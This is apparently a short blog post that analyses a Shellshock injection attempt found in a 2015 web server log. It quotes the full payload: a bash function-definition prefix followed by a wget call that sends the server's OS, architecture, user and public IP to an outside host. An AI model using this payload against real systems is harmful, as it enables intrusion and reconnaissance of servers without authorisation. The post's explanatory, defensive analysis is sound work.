46.151.212.26 - - [12/May/2015:01:31:28 +0200] "GET /cgi-bin/ HTTP/1.0" 408 519 "() { :; }; /usr/bin/wget -qO - http://x.saudi.su:404/gate.asp?info-`uname`-`uname -p`-`whoami`-`wget -U curl -qO- ifconfig.me`" "() { :; }; /usr/bin/wget -qO - http://x.saudi.su:404/gate.asp?info-`uname`-`uname -p`-`whoami`-`wget -U curl -qO- ifconfig.me`"
When executing the wget request (without the info) the final file just tells
Case study. Please bear with us. Thank you.The Idea behind the several statements is quite simple,
if the injection would work it would report to the page
- uname - might be Linux
- whoami - the user which owns/runs the shell
- and the output of ifconfig.me - what is the IP of the server
Keine Kommentare:
Kommentar veröffentlichen